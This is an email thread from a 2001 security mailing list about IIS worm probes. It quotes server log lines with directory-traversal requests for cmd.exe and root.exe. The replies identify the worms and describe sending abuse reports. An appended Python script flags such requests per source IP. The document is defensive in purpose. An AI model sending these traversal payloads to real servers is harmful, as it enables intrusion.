I have been logging these attempts on our Outlook Web Access server. I then attempt a WHOIS lookup on the source IP. I then send a nicely worded email to any and all contacts that show up on the WHOIS search.

I have had some "success" with the contacts responding with thanks or reporting that the server had been taken off-line. I think we need to help each other out and report these attacks as we can. I hope that if any of our servers are "caught" doing these attacks that others would contact me regarding the "offense". All of this is time-consuming but IMHO worth it.

Cheers,
Mark

-----Original Message-----
From: Matt Hemingway [mailto:[EMAIL PROTECTED]]
Sent: Monday, November 19, 2001 11:07 AM
To: Ryan Ratkiewicz; [EMAIL PROTECTED]
Subject: Re: IIS Hack Attempt

Code Red. Code Blue. Nimda. Take your pick.

-Matt

On Thursday 15 November 2001 10:18, Ryan Ratkiewicz wrote:
> Can someone help me decipher this?
>
> 11:30:48 207.217.205.149 GET /scripts/root.exe 404
> 11:30:48 207.217.205.149 GET /MSADC/root.exe 404
> 11:30:49 207.217.205.149 GET /c/winnt/system32/cmd.exe 404
> 11:30:49 207.217.205.149 GET /d/winnt/system32/cmd.exe 404
> 11:30:49 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500
> 11:30:49 207.217.205.149 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
> 11:30:50 207.217.205.149 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
> 11:30:50 207.217.205.149 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 500
> 11:30:50 207.217.205.149 GET /scripts/..Á../winnt/system32/cmd.exe 500
> 11:30:50 207.217.205.149 GET /scripts/winnt/system32/cmd.exe 404
> 11:30:51 207.217.205.149 GET /winnt/system32/cmd.exe 404
> 11:30:51 207.217.205.149 GET /winnt/system32/cmd.exe 404
> 11:30:51 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500
> 11:30:51 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500
> 11:30:52 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500
> 11:30:52 207.217.205.149 GET /scripts/..%2f../winnt/system32/cmd.exe 500
>
> Thanks.
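
An added example, not part of any message in this thread: a small Python script that flags the kind of probes quoted in Ryan's log and groups them per source IP, which is the information a WHOIS-based abuse report needs. The regex for the log layout, the signature checks, and the benign 192.0.2.10 line are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumed layout, matching the quoted log: time, client IP, method, URI, status.
LINE_RE = re.compile(r"^(\d\d:\d\d:\d\d) (\S+) (\S+) (\S+) (\d{3})$")

# First four lines are copied from the log quoted in the thread;
# the last line is a constructed benign request for contrast.
SAMPLE_LOG = """\
11:30:48 207.217.205.149 GET /scripts/root.exe 404
11:30:49 207.217.205.149 GET /c/winnt/system32/cmd.exe 404
11:30:49 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500
11:30:52 207.217.205.149 GET /scripts/..%2f../winnt/system32/cmd.exe 500
11:31:10 192.0.2.10 GET /exchange/logon.asp 200
"""

def classify(uri):
    """Return the reasons a request URI looks like a worm-style probe."""
    reasons = []
    # Decode percent-escapes and normalise backslashes before matching.
    decoded = unquote(uri).replace("\\", "/").lower()
    name = decoded.rsplit("/", 1)[-1]
    if name in ("root.exe", "cmd.exe"):
        reasons.append("requests " + name)
    if "../" in decoded:
        reasons.append("directory traversal")
    if re.search(r"%(5c|2f)", uri, re.I):
        reasons.append("percent-encoded path separator")
    return reasons

def summarize(log_text):
    """Group flagged requests per source IP for an abuse report."""
    report = defaultdict(lambda: {"hits": 0, "first": None, "last": None, "non_404": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or not classify(m.group(4)):
            continue
        when, ip, _method, _uri, status = m.groups()
        entry = report[ip]
        entry["hits"] += 1
        entry["first"] = entry["first"] or when
        entry["last"] = when
        # Statuses other than 404 are counted separately so they can be reviewed first.
        if status != "404":
            entry["non_404"] += 1
    return dict(report)

if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(ip, entry)
```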